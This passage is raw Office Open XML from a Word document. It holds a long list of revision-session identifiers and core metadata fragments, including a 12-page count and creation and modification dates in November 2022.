    <w:rsid w:val="00B631ED"/>
    <w:rsid w:val="00B663DC"/>
    <w:rsid w:val="00B673BE"/>
    <w:rsid w:val="00B750C7"/>
    <w:rsid w:val="00B80AAB"/>
    <w:rsid w:val="00B81D72"/>
    <w:rsid w:val="00B86313"/>
    <w:rsid w:val="00B86354"/>
    <w:rsid w:val="00B86ACC"/>
    <w:rsid w:val="00B90CD6"/>
    <w:rsid w:val="00BA0749"/>
    <w:rsid w:val="00BC695B"/>
    <w:rsid w:val="00BC6F0C"/>
    <w:rsid w:val="00BC7667"/>
    <w:rsid w:val="00BD3BBE"/>
    <w:rsid w:val="00BD4AAC"/>
    <w:rsid w:val="00BD4E0D"/>
    <w:rsid w:val="00BD629B"/>
    <w:rsid w:val="00BD65C3"/>
    <w:rsid w:val="00BD7CEC"/>
    <w:rsid w:val="00BE12C9"/>
    <w:rsid w:val="00BE2561"/>
    <w:rsid w:val="00BF0B6E"/>
    <w:rsid w:val="00BF3B72"/>
    <w:rsid w:val="00BF3F62"/>
    <w:rsid w:val="00C05080"/>
    <w:rsid w:val="00C06CD2"/>
    <w:rsid w:val="00C10F8B"/>
    <w:rsid w:val="00C145BC"/>
    <w:rsid w:val="00C14CC4"/>
    <w:rsid w:val="00C212D7"/>
    <w:rsid w:val="00C22E57"/>
    <w:rsid w:val="00C2380F"/>
    <w:rsid w:val="00C2796A"/>
    <w:rsid w:val="00C369A3"/>
    <w:rsid w:val="00C4273C"/>
    <w:rsid w:val="00C43BC5"/>
    <w:rsid w:val="00C43FB0"/>
    <w:rsid w:val="00C459B9"/>
    <w:rsid w:val="00C509FE"/>
    <w:rsid w:val="00C51670"/>
    <w:rsid w:val="00C52647"/>
    <w:rsid w:val="00C62EA3"/>
    <w:rsid w:val="00C65A48"/>
    <w:rsid w:val="00C72950"/>
    <w:rsid w:val="00C75697"/>
    <w:rsid w:val="00C7642A"/>
    <w:rsid w:val="00C8157F"/>
    <w:rsid w:val="00C85571"/>
    <w:rsid w:val="00C9782C"/>
    <w:rsid w:val="00CA0B69"/>
    <w:rsid w:val="00CA5E3B"/>
    <w:rsid w:val="00CB69AE"/>
    <w:rsid w:val="00CB6FED"/>
    <w:rsid w:val="00CB75EB"/>
    <w:rsid w:val="00CC65F5"/>
    <w:rsid w:val="00CD1086"/>
    <w:rsid w:val="00CD2409"/>
    <w:rsid w:val="00CD452C"/>
    <w:rsid w:val="00CE063A"/>
    <w:rsid w:val="00CE5E1F"/>
    <w:rsid w:val="00CE74AF"/>
    <w:rsid w:val="00CF6717"/>
    <w:rsid w:val="00D11E8D"/>
    <w:rsid w:val="00D15D21"/>
    <w:rsid w:val="00D212F5"/>
    <w:rsid w:val="00D260A7"/>
    <w:rsid w:val="00D31553"/>
    <w:rsid w:val="00D31D64"/>
    <w:rsid w:val="00D32D8E"/>
    <w:rsid w:val="00D42A7D"/>
    <w:rsid w:val="00D44AFA"/>
    <w:rsid w:val="00D65D16"/>
    <w:rsid w:val="00D7799A"/>
    <w:rsid w:val="00D80700"/>
    <w:rsid w:val="00D82BE7"/>
    <w:rsid w:val="00D83D93"/>
    <w:rsid w:val="00DA02EF"/>
    <w:rsid w:val="00DA0ECE"/>
    <w:rsid w:val="00DA27A1"/>
    <w:rsid w:val="00DA754A"/>
    <w:rsid w:val="00DB0903"/>
    <w:rsid w:val="00DB0FFD"/>
    <w:rsid w:val="00DB491A"/>
    <w:rsid w:val="00DC192F"/>
    <w:rsid w:val="00DD06AD"/>
    <w:rsid w:val="00DE4484"/>
    <w:rsid w:val="00DF2620"/>
    <w:rsid w:val="00DF78D7"/>
    <w:rsid w:val="00E05B7D"/>
    <w:rsid w:val="00E233C3"/>
    <w:rsid w:val="00E237E7"/>
    <w:rsid w:val="00E308B0"/>
    <w:rsid w:val="00E31157"/>
    <w:rsid w:val="00E32A5C"/>
    <w:rsid w:val="00E35EAE"/>
    <w:rsid w:val="00E41DE5"/>
    <w:rsid w:val="00E43DF7"/>
    <w:rsid w:val="00E4694E"/>
    <w:rsid w:val="00E52436"/>
    <w:rsid w:val="00E569C4"/>
    <w:rsid w:val="00E628FA"/>
    <w:rsid w:val="00E62E1A"/>
    <w:rsid w:val="00E744CE"/>
    <w:rsid w:val="00E77408"/>
    <w:rsid w:val="00E77CBD"/>
    <w:rsid w:val="00E81E27"/>
    <w:rsid w:val="00E828F1"/>
    <w:rsid w:val="00E82F3E"/>
    <w:rsid w:val="00E850B5"/>
    <w:rsid w:val="00E85572"/>
    <w:rsid w:val="00EA58CA"/>
    <w:rsid w:val="00EA7332"/>
    <w:rsid w:val="00EC64D0"/>
    <w:rsid w:val="00ED3085"/>
    <w:rsid w:val="00ED3731"/>
    <w:rsid w:val="00ED4198"/>
    <w:rsid w:val="00EE01DD"/>
    <w:rsid w:val="00EE3AAC"/>
    <w:rsid w:val="00EF173F"/>
    <w:rsid w:val="00EF1FC8"/>
    <w:rsid w:val="00EF6B0F"/>
    <w:rsid w:val="00F12471"/>
    <w:rsid w:val="00F14FAA"/>
    <w:rsid w:val="00F17F9E"/>
    <w:rsid w:val="00F2724A"/>
    <w:rsid w:val="00F30EB2"/>
    <w:rsid w:val="00F344E8"/>
    <w:rsid w:val="00F40368"/>
    <w:rsid w:val="00F4517E"/>
    <w:rsid w:val="00F55FC5"/>
    <w:rsid w:val="00F56F7A"/>
    <w:rsid w:val="00F579FF"/>
    <w:rsid w:val="00F62B37"/>
    <w:rsid w:val="00F74176"/>
    <w:rsid w:val="00F83183"/>
    <w:rsid w:val="00F95A4D"/>
    <w:rsid w:val="00FB0E91"/>
    <w:rsid w:val="00FB4FAC"/>
    <w:rsid w:val="00FB6D18"/>
    <w:rsid w:val="00FD0315"/>
    <w:rsid w:val="00FE16C1"/>
    <w:rsid w:val="00FE1984"/>
    <w:rsid w:val="00FE36AC"/>
    <w:rsid w:val="00FE6978"/>
    <w:rsid w:val="00FF400C"/>
    <w:rsid w:val="00FF6D91"/>
    <w:rsid w:val="00FF70B2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docId w15:val="{DE8C4B8F-B359-4F97-9591-A335DCEB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</TotalTime>
  <Pages>12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202</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-01T19:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-18T18:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>